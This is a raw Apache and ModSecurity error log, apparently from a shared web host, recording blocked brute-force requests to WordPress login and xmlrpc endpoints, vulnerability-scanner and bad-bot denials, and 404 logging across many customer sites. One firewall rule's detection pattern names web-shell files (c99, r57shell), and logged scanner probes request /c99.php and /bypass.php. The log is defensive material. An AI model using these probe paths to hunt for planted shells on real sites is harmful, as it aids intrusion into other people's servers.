[Tue May 26 15:58:03.960718 2026] [security2:error] [pid 745492:tid 745672] [client 106.219.85.83:26044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1s4mEQglTmoWcfxKYlwAAALQ"]
[Tue May 26 15:58:03.960816 2026] [security2:error] [pid 745492:tid 745672] [client 106.219.85.83:26044] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1s4mEQglTmoWcfxKYlwAAALQ"]
[Tue May 26 15:58:05.395797 2026] [security2:error] [pid 745492:tid 745626] [client 91.238.181.19:40912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1tYmEQglTmoWcfxKYzQAAAIY"]
[Tue May 26 15:58:05.748475 2026] [security2:error] [pid 745492:tid 745640] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1tYmEQglTmoWcfxKYyQAAAJQ"]
[Tue May 26 15:58:06.130973 2026] [security2:error] [pid 745492:tid 745549] [remote 92.117.185.70:61838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV1tYmEQglTmoWcfxKY2wAAsDU"]
[Tue May 26 15:58:06.816699 2026] [security2:error] [pid 745492:tid 745632] [client 91.238.181.19:40928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1tomEQglTmoWcfxKY8wAAAIw"]
[Tue May 26 15:58:07.640874 2026] [security2:error] [pid 745492:tid 745717] [client 103.44.52.196:39102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1t4mEQglTmoWcfxKZDgAAAOE"]
[Tue May 26 15:58:07.641019 2026] [security2:error] [pid 745492:tid 745717] [client 103.44.52.196:39102] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1t4mEQglTmoWcfxKZDgAAAOE"]
[Tue May 26 15:58:07.850676 2026] [security2:error] [pid 745492:tid 745692] [client 223.123.125.8:64782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1t4mEQglTmoWcfxKZFAAAAMg"]
[Tue May 26 15:58:07.850823 2026] [security2:error] [pid 745492:tid 745692] [client 223.123.125.8:64782] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1t4mEQglTmoWcfxKZFAAAAMg"]
[Tue May 26 15:58:07.899371 2026] [security2:error] [pid 745492:tid 745741] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1t4mEQglTmoWcfxKZBAAAAPk"]
[Tue May 26 15:58:08.267923 2026] [security2:error] [pid 745492:tid 745689] [client 91.238.181.19:40952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1uImEQglTmoWcfxKZHQAAAMU"]
[Tue May 26 15:58:09.872191 2026] [http2:info] [pid 762634:tid 762634] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:58:10.058036 2026] [security2:error] [pid 762634:tid 762765] [client 91.238.181.19:60750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1urx8rj1VZMqUAOdb4AAAAAE"]
[Tue May 26 15:58:10.606604 2026] [security2:error] [pid 762634:tid 762785] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1urx8rj1VZMqUAOdb5gAAABU"]
[Tue May 26 15:58:10.854581 2026] [security2:error] [pid 762634:tid 762825] [client 52.128.31.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1urx8rj1VZMqUAOdb-QAAAD0"], referer: https://www.anujtradingco.com/
[Tue May 26 15:58:11.890331 2026] [security2:error] [pid 762634:tid 762891] [client 91.238.181.19:60768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1u7x8rj1VZMqUAOdcIgAAAH8"]
[Tue May 26 15:58:12.101460 2026] [security2:error] [pid 762634:tid 762889] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1u7x8rj1VZMqUAOdcGwAAAH0"]
[Tue May 26 15:58:12.348592 2026] [security2:error] [pid 762634:tid 762781] [client 52.128.31.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1vLx8rj1VZMqUAOdcMAAAABE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467180&moderation-hash=2deb8a8c28da6452be42e88f0da5e5af
[Tue May 26 15:58:12.713505 2026] [security2:error] [pid 762634:tid 762791] [client 185.191.171.11:17666] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/6/"] [unique_id "ahV1vLx8rj1VZMqUAOdcNwAAABs"]
[Tue May 26 15:58:12.713646 2026] [security2:error] [pid 762634:tid 762791] [client 185.191.171.11:17666] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/6/"] [unique_id "ahV1vLx8rj1VZMqUAOdcNwAAABs"]
[Tue May 26 15:58:13.629212 2026] [security2:error] [pid 762634:tid 762814] [client 103.153.130.62:49523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1vbx8rj1VZMqUAOdcSwAAADI"]
[Tue May 26 15:58:13.629396 2026] [security2:error] [pid 762634:tid 762814] [client 103.153.130.62:49523] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1vbx8rj1VZMqUAOdcSwAAADI"]
[Tue May 26 15:58:13.750990 2026] [security2:error] [pid 762634:tid 762846] [client 91.238.181.19:60780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1vbx8rj1VZMqUAOdcUgAAAFI"]
[Tue May 26 15:58:14.537034 2026] [security2:error] [pid 762634:tid 762883] [client 106.219.85.83:20409] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1vrx8rj1VZMqUAOdcfgAAAHc"]
[Tue May 26 15:58:14.537132 2026] [security2:error] [pid 762634:tid 762883] [client 106.219.85.83:20409] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1vrx8rj1VZMqUAOdcfgAAAHc"]
[Tue May 26 15:58:14.598329 2026] [security2:error] [pid 762634:tid 762771] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1vrx8rj1VZMqUAOdcYQAAAAc"]
[Tue May 26 15:58:15.225138 2026] [security2:error] [pid 762634:tid 762864] [client 91.238.181.19:60794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1v7x8rj1VZMqUAOdclAAAAGQ"]
[Tue May 26 15:58:15.991882 2026] [security2:error] [pid 762634:tid 762644] [remote 95.216.117.13:38702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahV1v7x8rj1VZMqUAOdcnwAADQk"]
[Tue May 26 15:58:16.587479 2026] [security2:error] [pid 762634:tid 762771] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1wLx8rj1VZMqUAOdcsQAAAAc"]
[Tue May 26 15:58:16.663880 2026] [security2:error] [pid 762634:tid 762798] [client 223.123.125.8:64783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1wLx8rj1VZMqUAOdcwQAAACI"]
[Tue May 26 15:58:16.664038 2026] [security2:error] [pid 762634:tid 762798] [client 223.123.125.8:64783] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1wLx8rj1VZMqUAOdcwQAAACI"]
[Tue May 26 15:58:16.798415 2026] [security2:error] [pid 762634:tid 762852] [client 91.238.181.19:60808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1wLx8rj1VZMqUAOdcwgAAAFg"]
[Tue May 26 15:58:17.577673 2026] [security2:error] [pid 762634:tid 762874] [client 143.110.243.118:56290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/bypass.php"] [unique_id "ahV1wbx8rj1VZMqUAOdc2QAAAG4"]
[Tue May 26 15:58:17.808316 2026] [security2:error] [pid 762634:tid 762846] [client 103.44.52.196:36452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1wbx8rj1VZMqUAOdc2gAAAFI"]
[Tue May 26 15:58:17.808479 2026] [security2:error] [pid 762634:tid 762846] [client 103.44.52.196:36452] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1wbx8rj1VZMqUAOdc2gAAAFI"]
[Tue May 26 15:58:18.510572 2026] [security2:error] [pid 762634:tid 762801] [client 91.238.181.19:60832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1wrx8rj1VZMqUAOdc8QAAACU"]
[Tue May 26 15:58:18.751429 2026] [security2:error] [pid 762634:tid 762890] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1wrx8rj1VZMqUAOdc6gAAAH4"]
[Tue May 26 15:58:20.119424 2026] [security2:error] [pid 762634:tid 762844] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1w7x8rj1VZMqUAOddFwAAAFA"]
[Tue May 26 15:58:20.521463 2026] [security2:error] [pid 762634:tid 762778] [client 91.238.181.19:34388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1xLx8rj1VZMqUAOddLQAAAA4"]
[Tue May 26 15:58:20.852285 2026] [security2:error] [pid 762634:tid 762846] [client 52.128.31.170:36591] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV1xLx8rj1VZMqUAOddJgAAAFI"], referer: https://anujtradingco.com
[Tue May 26 15:58:20.963649 2026] [security2:error] [pid 762634:tid 762804] [client 14.183.110.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1xLx8rj1VZMqUAOddMAAAACg"]
[Tue May 26 15:58:22.265321 2026] [security2:error] [pid 762634:tid 762777] [client 91.238.181.19:34398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1xrx8rj1VZMqUAOddcAAAAA0"]
[Tue May 26 15:58:22.659427 2026] [security2:error] [pid 762634:tid 762843] [client 34.147.28.155:40960] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "www.tyrezambia.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahV1xrx8rj1VZMqUAOddhwAAAE8"]
[Tue May 26 15:58:22.659553 2026] [security2:error] [pid 762634:tid 762843] [client 34.147.28.155:40960] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.tyrezambia.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahV1xrx8rj1VZMqUAOddhwAAAE8"]
[Tue May 26 15:58:22.688412 2026] [security2:error] [pid 762634:tid 762808] [client 143.110.243.118:56300] ModSecurity: Access denied with connection close (phase 1). Pattern match "c99\\\\.php|r57shell\\\\.php|r57\\\\.php|c99\\\\.txt" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1164"] [id "900010"] [rev "1"] [msg "c99 variant "] [severity "CRITICAL"] [hostname "www.grcorp.moes-art.com"] [uri "/c99.php"] [unique_id "ahV1xrx8rj1VZMqUAOddiAAAACw"]
[Tue May 26 15:58:22.688928 2026] [security2:error] [pid 762634:tid 762786] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1xrx8rj1VZMqUAOdddgAAABY"]
[Tue May 26 15:58:23.634207 2026] [security2:error] [pid 762634:tid 762856] [client 91.238.181.19:34416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1x7x8rj1VZMqUAOddpAAAAFw"]
[Tue May 26 15:58:23.895843 2026] [security2:error] [pid 762634:tid 762882] [client 103.153.130.62:49798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1x7x8rj1VZMqUAOddqAAAAHY"]
[Tue May 26 15:58:23.895969 2026] [security2:error] [pid 762634:tid 762882] [client 103.153.130.62:49798] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1x7x8rj1VZMqUAOddqAAAAHY"]
[Tue May 26 15:58:24.810322 2026] [security2:error] [pid 762634:tid 762680] [remote 91.227.122.219:33314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV1yLx8rj1VZMqUAOddwgAAFi0"]
[Tue May 26 15:58:24.875537 2026] [security2:error] [pid 762634:tid 762806] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1yLx8rj1VZMqUAOddtwAAACo"]
[Tue May 26 15:58:25.121200 2026] [security2:error] [pid 762634:tid 762852] [client 91.238.181.19:34444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1ybx8rj1VZMqUAOdd1wAAAFg"]
[Tue May 26 15:58:25.281015 2026] [security2:error] [pid 762634:tid 762823] [client 106.219.85.83:3305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1ybx8rj1VZMqUAOdd2AAAADs"]
[Tue May 26 15:58:25.281198 2026] [security2:error] [pid 762634:tid 762823] [client 106.219.85.83:3305] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1ybx8rj1VZMqUAOdd2AAAADs"]
[Tue May 26 15:58:26.925781 2026] [security2:error] [pid 762634:tid 762857] [client 91.238.181.19:34450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1yrx8rj1VZMqUAOdeGQAAAF0"]
[Tue May 26 15:58:26.991382 2026] [security2:error] [pid 762634:tid 762781] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1yrx8rj1VZMqUAOdeEQAAABE"]
[Tue May 26 15:58:27.538997 2026] [autoindex:error] [pid 762634:tid 762809] [client 4.43.184.113:37621] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:58:28.311569 2026] [security2:error] [pid 762634:tid 762868] [client 40.77.167.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahV1yrx8rj1VZMqUAOdeCAAAaBM"]
[Tue May 26 15:58:28.360276 2026] [security2:error] [pid 762634:tid 762774] [client 223.123.125.8:64785] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1zLx8rj1VZMqUAOdeSQAAAAo"]
[Tue May 26 15:58:28.360460 2026] [security2:error] [pid 762634:tid 762774] [client 223.123.125.8:64785] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1zLx8rj1VZMqUAOdeSQAAAAo"]
[Tue May 26 15:58:28.395410 2026] [security2:error] [pid 762634:tid 762793] [client 103.44.52.196:42286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1zLx8rj1VZMqUAOdeRwAAAB0"]
[Tue May 26 15:58:28.395543 2026] [security2:error] [pid 762634:tid 762793] [client 103.44.52.196:42286] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1zLx8rj1VZMqUAOdeRwAAAB0"]
[Tue May 26 15:58:28.438029 2026] [security2:error] [pid 762634:tid 762890] [client 91.238.181.19:34460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1zLx8rj1VZMqUAOdeTQAAAH4"]
